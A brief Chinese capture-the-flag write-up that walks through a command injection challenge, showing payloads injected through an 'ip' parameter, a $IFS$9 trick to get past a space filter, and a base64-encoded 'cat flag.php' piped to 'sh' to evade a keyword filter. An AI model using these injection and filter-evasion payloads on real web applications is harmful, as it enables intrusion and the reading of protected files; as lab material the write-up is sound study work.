本文介绍了一种绕过网站文件名过滤的方法,通过使用特殊字符和编码技巧,成功访问被过滤的flag文件。文章详细展示了如何利用$IFS变量和base64编码来规避常见的安全限制。
列出当前目录下的文件
?ip=1;ls
那么我们就要打开flag.php文件
发现过滤了空格
经过测试我们发现$IFS$9 可以绕过空格
又发现它绕过了flag
我们先看看index.php
得知flag的过滤方式
我们可以采用base64方法编码方式绕过
需要执行的命令:
cat$IFS$9flag.php
编码后:
Y2F0JElGUyQ5ZmxhZy5waHA=
so, payload如下
?ip=1;echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
